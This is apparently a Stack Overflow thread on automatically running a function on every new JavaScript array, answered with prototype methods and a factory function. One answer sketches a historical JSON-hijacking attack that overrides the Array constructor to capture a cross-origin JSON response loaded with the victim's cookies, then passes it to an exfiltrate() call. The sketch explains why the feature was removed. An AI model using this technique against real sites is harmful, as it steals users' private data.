# Is it possible to carry out a function every time an Array is created?

Tags: javascript, arrays

When an array is created, I need a function to be called on that array automatically. I figured this would be possible using the Array's prototype / constructor somehow, but I'm at a loss as to how to solve this problem.

So I have an Array, which I initialise:

```
var arr = [1, 2, 3];
```

Now let's say I have a function like so:

```
Array.prototype.objectArray = function() {
    var result = this.every(function(elem) {
        return typeof elem == "object";
    });
    this.isObjectArray = result;
}
```

So in this case, calling the function on this array would assign its `isObjectArray` parameter to `false`.

However, what I want is for this function to run on the array every time an array is created, automatically, so that *by default* every array has its `isObjectArray` property set. Is this possible?

Thanks in advance!

Comment: Just create a "factory" function which takes an array as parameter and then does whatever you want on it.

Comment: Modifying built-in objects is a bad idea. Especially `Array`s which can't be inherited like other objects. I think Matteo's idea of a factory function is probably the best approach.

Answer (score 5, accepted):

To my knowledge it is not possible, but you can define a function that lazily computes whether the array only contains objects:

```js
Array.prototype.isObjectArray = function () {
  if (typeof(this.__isObjectArray) === 'undefined') {
    this.__isObjectArray = this.every(function(elem) {
      return typeof elem == "object";
    });
  }
  
  return this.__isObjectArray;
};


var a = [1, 2, 3];
var b = [[], {}];

alert("a: " + a.isObjectArray() + ", b: " + b.isObjectArray());
```

The above code only does the computation once (the first time it's requested) and on subsequent calls it only returns the already computed value.

Also, if you create arrays on which you do not call `isObjectArray()`, the computation is never done.

Answer (score 1):

No.  This was possible under EcmaScript 3 by overriding `Array`, but this opened up a number of nasty security holes like [Jeremiah Grossman's contact list exfiltration attack against Gmail](http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html), so it's unlikely that any similar feature will be introduced.

If an attacker can cause a user to visit a page then they can do something like:

```
<script>
var arrayStolenFromJSONWebAPI;
var originalArray = Array;
Array = function () {
  var arr = new originalArray();
  originalArray.prototype.push.apply(arr, arguments);
  if (!arrayStolenFromJSONWebAPI) {
    arrayStolenFromJSONWebAPI = arr;
  }
  return arr;
}
</script>
<!-- XSRF attack that loads JSON requested with user's cookies -->
<script src="http://foo.com/web_api_in_same_origin_that_returns_json"></script>
<script>
exfiltrate(arrayStolenFromJSONWebAPI);
</script>
```

Answer (score 0):

Though @w0lf has already answered my question really well, @MatteoTassinari got a lot of upvotes for this comment:

> Just create a "factory" function which takes an array as parameter and then does whatever you want on it.

So I thought I'd check out factories and answer my question with one, for anyone viewing the question who might be as interested as I was in factories. Here's what I came up with:

```
function arrayFactory(arr){
    var result = arr.every(function(elem) {
        return typeof elem == "object";
    });
    arr.isObjectArray = result;
    return arr;
}

var arr = arrayFactory([1, 2, 3]);
console.log(arr.isObjectArray);     //false
```

So basically, a "factory" function is any function that just returns a new object - which in my case is the array, which I mutate in the factory by adding the `isObjectArray` variable to it. Simple!